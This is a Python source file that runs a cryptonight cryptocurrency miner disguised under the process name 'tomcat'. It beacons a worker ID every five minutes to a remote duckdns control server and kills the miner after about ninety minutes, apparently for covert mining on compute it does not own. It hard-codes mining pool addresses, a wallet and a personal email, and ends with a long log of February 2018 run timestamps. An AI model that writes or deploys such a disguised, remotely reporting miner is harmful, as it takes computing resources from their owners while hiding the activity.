import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:36:06.211234
#2018-02-17 16:22:01.469899
#2018-02-17 18:09:02.076993
#2018-02-17 19:56:07.252088
#2018-02-17 21:44:05.363559
#2018-02-17 23:28:01.470210
#2018-02-18 01:18:04.366580
#2018-02-18 03:05:05.833913
#2018-02-18 04:53:06.740338
#2018-02-18 06:44:01.982757
#2018-02-18 08:32:05.336497
#2018-02-18 10:19:07.079905
#2018-02-18 12:05:05.230152
#2018-02-18 13:50:04.830550
#2018-02-18 15:40:09.518465
#2018-02-18 17:29:06.927803
#2018-02-18 19:17:01.561090
#2018-02-18 21:03:05.115422
#2018-02-18 22:49:01.878469
#2018-02-19 00:38:03.241721
#2018-02-19 02:24:06.605446
#2018-02-19 04:11:06.504484
#2018-02-19 05:55:04.616460
#2018-02-19 07:43:07.935107
#2018-02-19 09:33:03.715791
#2018-02-19 11:23:04.955142
#2018-02-19 13:10:03.144242
#2018-02-19 14:58:03.048504
#2018-02-19 16:47:02.152801
#2018-02-19 18:35:07.878182
#2018-02-19 20:22:02.104682
#2018-02-19 22:12:06.108096
#2018-02-19 23:57:03.887933
#2018-02-20 01:44:07.555035
#2018-02-20 03:33:06.900136
#2018-02-20 05:20:05.440640
#2018-02-20 07:03:05.354514
#2018-02-20 08:48:07.777722
#2018-02-20 10:32:03.929907
#2018-02-20 12:17:08.810614
#2018-02-20 14:05:07.503070
#2018-02-20 15:50:07.383805
#2018-02-20 17:37:10.028185
#2018-02-20 19:26:01.458103
#2018-02-20 21:15:03.814407
#2018-02-20 23:01:04.354543
#2018-02-21 00:44:06.196725
#2018-02-21 02:31:02.251811
#2018-02-21 04:18:07.424540
#2018-02-21 06:07:01.663466
#2018-02-21 07:53:03.792346
#2018-02-21 09:38:06.308965
#2018-02-21 11:25:09.747607
#2018-02-21 13:14:01.783126
#2018-02-21 14:59:04.828976
#2018-02-21 16:48:04.613693
#2018-02-21 18:35:05.804064
#2018-02-21 20:20:07.275458
#2018-02-21 22:07:06.786057
#2018-02-21 23:57:06.937756
#2018-02-22 01:46:05.380676
#2018-02-22 03:33:03.984045
#2018-02-22 05:19:05.349416
#2018-02-22 07:03:05.013463
#2018-02-22 08:49:07.800459
#2018-02-22 10:36:08.699347
#2018-02-22 12:22:01.731370
#2018-02-22 14:08:06.708646
#2018-02-22 15:54:06.154053
#2018-02-22 17:42:03.933078
#2018-02-22 19:28:08.792950
#2018-02-22 21:22:04.441705
#2018-02-22 23:08:04.900963
#2018-02-23 00:55:06.239234
#2018-02-23 02:41:07.897196
#2018-02-23 04:29:04.094492
#2018-02-23 06:15:05.545492
#2018-02-23 08:02:08.155017
#2018-02-23 10:17:01.228809
#2018-02-23 12:12:01.893689
#2018-02-23 13:59:07.040690
#2018-02-23 15:52:09.510149
#2018-02-23 17:39:05.528335
#2018-02-23 19:26:08.756786
#2018-02-23 21:11:02.152995
#2018-02-23 22:56:07.441202
#2018-02-24 00:44:06.585552
#2018-02-24 02:39:03.892564
#2018-02-24 04:34:02.069554
#2018-02-24 06:18:07.292428
#2018-02-24 08:06:04.478078
#2018-02-24 09:50:01.507434
#2018-02-24 11:44:07.679101
#2018-02-24 13:36:01.686451
#2018-02-24 15:23:01.244891
#2018-02-24 17:12:07.120791
#2018-02-24 19:04:06.833713
#2018-02-24 20:53:04.968231
#2018-02-24 23:14:06.048713
#2018-02-25 02:39:04.317919
#2018-02-25 06:09:01.624373
#2018-02-25 11:38:01.705594